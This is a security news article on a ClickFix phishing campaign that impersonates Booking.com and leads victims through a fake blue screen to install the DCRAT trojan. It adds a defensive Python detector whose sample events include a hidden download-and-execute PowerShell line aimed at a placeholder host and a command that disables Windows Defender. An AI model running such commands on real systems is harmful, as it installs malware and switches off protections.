
A fake email campaign impersonating Booking.com was recently detected by security researchers. The messages warn of alleged problems with reservations or pending refunds and include malicious links that lead to a chain of deceptions, the goal of which is to trick the victim into installing infostealer malware, designed to steal sensitive information. The campaign was analyzed by Securonix.
The technique used, known as ClickFix, reflects the evolution of social engineering as an attack vector. Instead of directly exploiting technical vulnerabilities, attackers manipulate users into executing malicious commands on their systems. According to the latest ESET Threat Report, this technique saw a growth of over 500% in detections during the first quarter of 2025, positioning itself as the second most frequent attack vector after phishing.
The fraudulent email uses Booking.com’s branding and language, making it difficult to distinguish from a legitimate one. Feeling the urgency to resolve a supposed booking issue, the user clicks on the link in the message, which redirects them to a fake website that mimics the original platform.
On the fraudulent site, the browser displays a false message indicating that the page is taking too long to load. Upon clicking the refresh button, the browser goes into full-screen mode and displays a fake Windows Blue Screen of Death (BSOD), simulating a critical system error.
Unlike a real BSOD, this screen includes instructions for the user to run commands in PowerShell or the Windows Run dialog box, under the guise of fixing the supposed technical problem. In doing so, the victim ends up infecting their own computer.
Following the instructions triggers a chain of malicious actions, including the download of a .NET project compiled using MSBuild.exe, the installation of a remote access Trojan (DCRAT), the disabling of defenses like Windows Defender, and the granting of persistence and privilege escalation on the system.
This malware allows remote control of the computer, keystroke logging, command execution, and the download of additional payloads, such as cryptocurrency miners, facilitating data theft and lateral spread.
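As an added example (not code from the article, Securonix or ESET), the following Python detector applies the chain described above to constructed process-creation records: PowerShell started from explorer.exe (the Run dialog) with download-and-execute markers, MSBuild.exe compiling a project from a user-writable path or spawned by a shell, and Windows Defender tampering via Set-MpPreference. The event field names, file paths and command lines are constructed assumptions for illustration, not indicators taken from the campaign.

```python
import re
# Constructed Sysmon-style process-creation records (assumed field names; not real telemetry).
EVENTS = [
    {"id": "e1", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (iwr https://example.invalid/fix)"'},
    {"id": "e2", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmd": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.proj"},
    {"id": "e3", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"id": "e4", "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmd": r"MSBuild.exe C:\src\app\app.csproj"},  # legitimate developer build, must not alert
    {"id": "e5", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-ChildItem"},  # benign interactive use, must not alert
]
# Markers typical of "paste this to fix the error" payloads: download-and-run, hidden window, encoded command.
DOWNLOAD_EXEC = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b|-enc(odedcommand)?\b|-w\s+hidden", re.I)
# Defender tampering through its own cmdlets (real parameters of Set-MpPreference / Add-MpPreference).
DEFENDER_TAMPER = re.compile(r"\b(Set|Add)-MpPreference\b.*-(DisableRealtimeMonitoring|ExclusionPath)\b", re.I)
# A project file under a user-writable location is unusual for a genuine developer build.
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Downloads|Public|ProgramData)\\", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the names of the rules that fire for one process-creation record."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmd"]
    hits = []
    # Stage 1: the user types the "fix" into the Run dialog or a console, so the parent is explorer.exe.
    if img in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe" and DOWNLOAD_EXEC.search(cmd):
        hits.append("clickfix_run_dialog_download_exec")
    # Stage 2: MSBuild.exe used as a proxy to compile and run the dropped .NET project.
    if img == "msbuild.exe" and (parent in SHELLS or USER_WRITABLE.search(cmd)):
        hits.append("msbuild_proxy_execution")
    # Stage 3: defenses switched off from a shell, whatever its parent.
    if img in SHELLS and DEFENDER_TAMPER.search(cmd):
        hits.append("defender_tamper")
    return hits

def scan(events):
    """Map event id -> fired rules, keeping only events that triggered something."""
    return {ev["id"]: hits for ev in events if (hits := classify(ev))}
```

Running `scan(EVENTS)` flags e1, e2 and e3 as the three stages of the chain while the developer build (e4) and the plain interactive shell (e5) stay quiet; tune the regexes against your own baseline before deploying them as alerts.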
“Cybercriminals no longer need to directly compromise the system: they only need to convince the user to do it for them. That’s why campaigns like ClickFix demonstrate that education and paying attention to urgent messages remain key protective barriers”, says Martina López, IT Security Specialist at ESET Latin America.
How to prevent these types of attacks
- Always verify the authenticity of emails.
- Do not run unknown commands or follow instructions on supposed error screens.
- Train staff, especially in sectors where urgency is common.
- Use reliable security solutions that detect abuse of legitimate tools and block unauthorized downloads.
- Educate about social engineering: understand that many current threats rely more on manipulating the user than on directly compromising software.
